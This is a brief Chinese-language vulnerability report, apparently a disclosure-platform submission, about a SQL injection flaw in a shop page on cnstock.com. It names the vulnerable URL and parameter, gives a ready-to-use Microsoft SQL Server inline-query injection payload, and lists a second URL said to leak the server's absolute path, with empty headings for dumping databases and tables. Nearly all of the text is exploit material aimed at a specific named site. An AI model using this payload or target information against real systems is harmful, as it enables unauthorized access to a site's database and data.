问题url:
http://shop.cnstock.com/gouwulist.aspx?Id=16
注入类型:
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Id=(SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (3604=3604) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(117)+CHAR(113)+CHAR(113))
爆库爆表:
爆绝对路径:
http://shop.cnstock.com/ProductDetial.aspx?id=4%E2%80%9D&os=4